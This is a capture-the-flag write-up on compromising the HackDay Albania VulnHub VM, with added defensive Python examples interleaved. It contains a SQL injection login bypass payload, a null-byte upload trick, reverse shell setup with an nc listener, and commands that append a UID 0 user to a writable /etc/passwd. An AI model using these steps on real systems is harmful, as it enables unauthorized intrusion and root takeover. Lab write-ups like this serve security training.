[Vulnhub] Hackday Albania 2016

Reconnaissance

Let's do this. We have a VM from VulnHub called HackDay: Albania, which is a pretty awesome VM,
and it was quite a fight to pwn this box.

So after running

arp-scan -l

we got 192.168.1.13 as the target IP address.
Now let's scan all ports on the target:

nmap -v -sV -p- 192.168.1.13

which gives us the following output:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So now we know that SSH is open, and they also seem to have moved the webserver to port 8008, sneaky hehe.
Let's see what is on the website. There is a Mr. Robot background and a popup message which translates to “Welcome, If I am, I know where to go;)”, so I thought that would be a reference to robots.txt. Even if it wasn't there, it's the first thing I check when I encounter a web application.

http://192.168.1.13:8008/robots.txt

 

output:
Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/

After checking a few of them and getting trolled with an image of a dinosaur (Philosoraptor),
this one gives us a different message:

http://192.168.1.13:8008/unisxcudkqjydw
IS there any /vulnbank/ in there ???

Alright, so we have a hint that there might be a folder called /vulnbank/ in here.
We browse to this folder and yup, it has directory listing enabled, showing us a client folder,
and when we click on the folder named client we get the bank website.

Let's pwn the bank

On the bank website we see there is a username and password form, so let's see if the username field is vulnerable to SQL injection.

So let's type a ' into the username field:

Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 102

At first I tried to use sqlmap and dump the database, however this was not working since I couldn't retrieve any DBMS names.
So then I tried to bypass the login form with '# to comment out the rest of the query. It didn't return an error message, so now we need a valid username.
Let's intercept the request and send it to Burp Suite Intruder:

username=§user§' #&password=foobar

After brute-forcing the username with Burp Suite, this is the final payload to bypass the login form:

jeff'#
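Why that payload works, and what the fix looks like, as an added example that is not part of the original writeup or the VM's code. It builds a constructed in-memory SQLite users table (the name jeff and the password are made up) and puts the string-concatenated login query next to a parameterized one. SQLite's line-comment marker is --, so the bypass string here is jeff'-- where MySQL also accepts the # the writeup used.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the bank's users table (hypothetical data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES ('jeff', 'hunter2')")
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """The anti-pattern: untrusted input pasted straight into the SQL text.

    A lone quote breaks the statement (the mysqli warning the writeup saw);
    a quote followed by a comment marker drops the password check entirely.
    """
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    try:
        return conn.execute(query).fetchone() is not None
    except sqlite3.OperationalError:
        # Malformed SQL: the equivalent of mysqli_query() returning false.
        return False


def safe_login(conn, username, password):
    """Parameterized query: values travel separately from the SQL text, so
    quotes and comment markers inside them are just characters to compare."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    bypass = "jeff'--"  # SQLite comment syntax; MySQL also accepts '#'
    print("vulnerable:", vulnerable_login(db, bypass, "not-the-password"))  # True
    print("safe:      ", safe_login(db, bypass, "not-the-password"))        # False
```

The parameterized version is the whole fix for this class of bug; the comparison still happens against a plaintext password here only to keep the example short, a real login would compare against a salted hash.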

 

Bypassing the ticket system

Awesome, we bypassed the login, now let's see if we can loot this bank haha.
We can see there is a ticket upload system on the right side of the app. I am pretty sure we need to upload a shell using the file upload within the ticket system.

First I tried uploading a normal .php file and we got the following error:

After we got hacked we our allowing only image files to upload such as jpg , jpeg , bmp etc...

OK, so we need to bypass this protection. Let's try uploading a PHP file named .php%00.jpg, the old null-byte trick,
and the file is successfully uploaded. Let's try to view it by dragging the broken image icon to the URL bar,

and we get the following error:

Warning: include(): Failed opening 'upload/php-reverse-shell.php' for inclusion (include_path='.:/usr/share/php') in /var/www/html/unisxcudkqjydw/vulnbank/client/view_file.php on line 13

 

Getting shell

We get an include error, so apparently there is an include() call in the PHP code. So we can just upload a JPEG with PHP code embedded in it; the include will execute the PHP code in the image and return a shell to us.
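The two weaknesses this section walks through (an extension check that a null byte in the filename gets past, and a viewer that include()s the upload) both have straightforward fixes. Here they are as an added Python example, not code from the writeup or the VM: the allowlist, the magic-byte table and the sample bytes are constructed for the example. The check takes the extension only from the final suffix of the basename, rejects NUL bytes outright, requires the content to start with the magic bytes of the claimed format, and stores the file under a server-generated name; the viewer returns the bytes as opaque image data and never evaluates them, which is what makes PHP embedded in a JPEG harmless.

```python
import os
import secrets

# Allowlist matching what the app's error message says it accepts, paired
# with the bytes each format must begin with. (Constructed for this example.)
ALLOWED = {
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".bmp":  (b"BM",),
}


def validate_upload(filename, data):
    """Return (True, stored_name) or (False, reason) for one upload.

    Checks, in order: no NUL in the name, the extension of the *last* suffix
    of the basename only, and magic bytes that match that extension. The
    stored name is generated server-side and never reuses user input.
    """
    if "\x00" in filename:
        return False, "null byte in filename"
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        return False, "extension not allowed: %r" % ext
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match %s" % ext
    # Magic bytes prove the file *starts* like an image, not that it contains
    # nothing else, so the viewer below must treat it as data, never code.
    return True, secrets.token_hex(16) + ext


def serve_upload(store, name):
    """Viewer: look the file up by its generated name and hand the bytes back
    as an opaque image with a fixed content type. Nothing here evaluates the
    contents, which is the difference between this and include()'ing it."""
    if name not in store:
        return None
    ext = os.path.splitext(name)[1]
    content_type = "image/bmp" if ext == ".bmp" else "image/jpeg"
    return content_type, store[name]


if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0" + bytes(16)          # constructed JPEG header
    store = {}
    for name, data in [("shell.php\x00.jpg", jpeg), ("shell.php", jpeg),
                       ("photo.jpg", b"<?php echo 1; ?>"), ("photo.jpg", jpeg)]:
        ok, info = validate_upload(name, data)
        print("%-20r -> %s %s" % (name, "stored as" if ok else "rejected:", info))
        if ok:
            store[info] = data
```

Keeping uploads out of the web root (or at least in a directory the server will not execute scripts from) is the other half of the fix; the random name here also avoids leaning on how the web server interprets a name like shell.php.jpg.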

I used a pentestmonkey PHP reverse shell, but also tried it with an msfvenom meterpreter reverse_tcp and that worked as well. So now just set up a nc listener and catch your shell:

nc -lvp 4444

Now we can go back to our ticket, view the file and we receive the shell ^_^
Note: if you want to catch a meterpreter shell you need to set up a multi/handler first.

Now that we have the shell, we can try to get a TTY shell with python. However, in this case python was not installed, so I used this:

script /dev/null -c bash

Voila, now we have a TTY shell.

Escalating privileges

Now we need to see how to get root on the box. First I checked the /home folder, but there was only a single user there, nothing interesting.

Let's see if there are any files we can write to:

find / -writable -type f 2>/dev/null

We can see that /etc/passwd is writable, so if we add a user there with root privileges we should have root. So we copy the passwd file to our box and make a hashed password using:

openssl passwd -1
Password:
Verifying - Password:
$1$snYvkX/A$Mk6h7Oxwx90/DotTuZJdv

(the password is test)

rootaccess:$1$snYvkX/A$Mk6h7Oxwx90/DotTuZJdv:0:0:rootaccess:/root:/bin/bash

Let's save the file and encode it in base64 so we can paste it over. Note: don't forget the -w 0, otherwise you'll have problems pasting it over:

cat passwd | base64 -w 0

Now let's copy the base64-encoded string, pipe it into base64 -d on the target and write it to the passwd file:

echo "b64stringhere" | base64 -d >> /etc/passwd

Now let's check whether the /etc/passwd file contains our new user:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
rootaccess:$1$snYvkX/A$Mk6h7Oxwx90/DotTuZJdv:0:0:rootaccess:/root:/bin/bash
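What a defender would look for after this: a writable /etc/passwd is the root cause, and the added line above is the symptom. Here is an added Python audit, not code from the writeup or the VM, that parses passwd-format text and flags a second UID 0 account, a password hash stored in passwd instead of shadow, empty password fields, duplicate names and malformed lines, plus a helper that checks the file mode for group or world write. The SAMPLE text is constructed from the listing above (the rootaccess line is the one the writeup added).

```python
import os
import stat

# Constructed from the listing in the writeup; the rootaccess line is the one
# the writeup appended.
SAMPLE = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
rootaccess:$1$snYvkX/A$Mk6h7Oxwx90/DotTuZJdv:0:0:rootaccess:/root:/bin/bash
"""

FIELDS = ("name", "pw", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text):
    """Parse passwd-format text into dicts; malformed lines are kept and marked."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != len(FIELDS):
            entries.append({"line": lineno, "malformed": line})
            continue
        entry = dict(zip(FIELDS, fields))
        entry["line"] = lineno
        entries.append(entry)
    return entries


def audit_passwd(text):
    """Return (line_number, finding) tuples for suspicious passwd entries."""
    findings = []
    seen = set()
    for e in parse_passwd(text):
        if "malformed" in e:
            findings.append((e["line"], "malformed entry"))
            continue
        if e["name"] in seen:
            findings.append((e["line"], "duplicate username %s" % e["name"]))
        seen.add(e["name"])
        if e["uid"] == "0" and e["name"] != "root":
            findings.append((e["line"], "extra UID 0 account %s" % e["name"]))
        if e["pw"] == "":
            findings.append((e["line"], "empty password field for %s" % e["name"]))
        elif e["pw"] not in ("x", "*", "!"):
            # Anything but a shadow marker means a hash lives in world-readable passwd.
            findings.append((e["line"], "password hash stored in passwd for %s" % e["name"]))
    return findings


def is_group_or_world_writable(mode):
    """True when an st_mode grants write to group or others (0644 is the norm)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


if __name__ == "__main__":
    for line, finding in audit_passwd(SAMPLE):
        print("sample line %d: %s" % (line, finding))
    # Run the same checks against the live file on this host.
    mode = os.stat("/etc/passwd").st_mode
    print("/etc/passwd writable by group/other:", is_group_or_world_writable(mode))
    with open("/etc/passwd") as fh:
        for line, finding in audit_passwd(fh.read()):
            print("/etc/passwd line %d: %s" % (line, finding))
```

The permission check is the one that matters most: the find -writable command in the writeup is exactly the check an attacker runs, so it is also the one worth running yourself, and any write to /etc/passwd by a non-root user is worth an alert on its own.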

Now we can log in as the new user we created:

su rootaccess

And we got root on the b0x, YEAH! ^_^
So all we have to do now is cat the flag:

cat flag.txt

(the flag is shown as an image in the original post)

The End.
Thanks for reading my writeup.
